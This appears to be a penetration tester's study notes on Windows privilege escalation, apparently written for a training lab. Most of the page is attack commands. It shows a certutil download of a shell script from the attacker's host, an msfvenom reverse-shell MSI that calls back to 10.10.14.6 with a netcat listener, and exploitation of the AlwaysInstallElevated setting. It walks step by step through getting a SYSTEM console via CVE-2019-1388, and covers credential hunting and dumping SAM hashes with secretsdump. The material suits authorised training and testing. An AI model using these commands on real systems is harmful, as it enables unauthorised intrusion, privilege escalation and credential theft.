Skip to content

Misc

Living off the Land Binaries and Scripts (LOLBAS)

  • https://lolbas-project.github.io/

Certutil

  • Transferring File with Certutil
    • certutil.exe -urlcache -split -f http://10.10.14.6:8080/shell.bat shell.bat
  • Encoding File with Certutil
    • certutil -encode file1 encodedfile
  • Decoding File with Certutil
    • certutil -decode encodedfile file2

RUNDLL32

  • A binary such as rundll32.exe can be used to execute a DLL file. We could use this to obtain a reverse shell by executing a .DLL file that we either download onto the remote host or host ourselves on an SMB share.

Always Install Elevated

  • Enumerating 'Always Install Elevated' Setting
    • reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
      • RESPONSE - AlwaysInstallElevated REG_DWORD 0x1
  • Generating MSI Package
    • msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.6 lport=9443 -f msi > aie.msi
  • Executing MSI Package
    • nc -nvlp 9443
    • msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart
  • Catching Shell
    • we should get NT AUTH/system
  • This issue can be mitigated by disabling the two Local Group Policy settings mentioned above.

CVE-2019-1388

  • CVE-2019-1388 was a privilege escalation vulnerability in the Windows Certificate Dialog, which did not properly enforce user privileges. The issue was in the UAC mechanism, which presented an option to show information about an executable's certificate, opening the Windows certificate dialog when a user clicks the link. The Issued By field in the General tab is rendered as a hyperlink if the binary is signed with a certificate that has Object Identifier (OID) 1.3.6.1.4.1.311.2.1.10. This OID value is identified in the wintrust.h header as SPC_SP_AGENCY_INFO_OBJID which is the SpcSpAgencyInfo field in the details tab of the certificate dialog. If it is present, a hyperlink included in the field will render in the General tab. This vulnerability can be exploited easily using an old Microsoft-signed executable (hhupd.exe) that contains a certificate with the SpcSpAgencyInfo field populated with a hyperlink.
  • When we click on the hyperlink, a browser window will launch running as NT AUTHORITY\SYSTEM. Once the browser is opened, it is possible to "break out" of it by leveraging the View page source menu option to launch a cmd.exe or PowerShell.exe console as SYSTEM.
  • Exploitable for versions - https://web.archive.org/web/20210620053630/https://gist.github.com/gentilkiwi/802c221c0731c06c22bb75650e884e5a

Exploitation

  • Click on the hhupd.exe executable
  • click on Show information about the publisher's certificate
  • in Details > find the SpcSpAgencyInfo field is populated
  • Click Issued by hyperlink and press OK
    • If we open Task Manager, we will see that the browser instance was launched as SYSTEM.
  • Next, we can right-click anywhere on the web page and choose View page source.
    • Once the page source opens in another tab, right-click again and select Save as, and a Save As dialog box will open.
  • At this point, we can launch any program we would like as SYSTEM.
    • Type c:\windows\system32\cmd.exe in the file path and hit enter. If all goes to plan, we will have a cmd.exe instance running as SYSTEM.
  • PATCH - https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2019-1388

Scheduled Tasks

  • Enumerating Scheduled Tasks
    • schtasks /query /fo LIST /v
  • Enumerating Scheduled Tasks with PowerShell
    • Get-ScheduledTask | select TaskName,State
  • Checking Permissions on C:\Scripts Directory
    • .\accesschk64.exe /accepteula -s -d C:\Scripts\

User/Computer Description Field

  • a sysadmin could store account details in a computers/users description field
  • Checking Local User Description Field
    • Get-LocalUser
    • Get-DomainUser * |select samaccountname,description | ?{$_.Description -ne $null}
  • Enumerating Computer Description Field with Get-WmiObject Cmdlet
    • Get-WmiObject -Class Win32_OperatingSystem | select Description

Mount VHDX/VMDK

  • Mount VMDK on Linux
    • guestmount -a SQL01-disk1.vmdk -i --ro /mnt/vmdk
  • Mount VHD/VHDX on Linux
    • guestmount --add WEBSRV10.vhdx --ro /mnt/vhdx/ -m /dev/sda1
  • Mounting on Windows
    • https://www.nakivo.com/blog/extract-content-vmdk-files-step-step-guide/
  • Retrieving Hashes using Secretsdump.py
    • If we manage the above,  we can access the C:\Windows\System32\Config directory and pull down the SAMSECURITY and SYSTEM registry hives.
    • secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL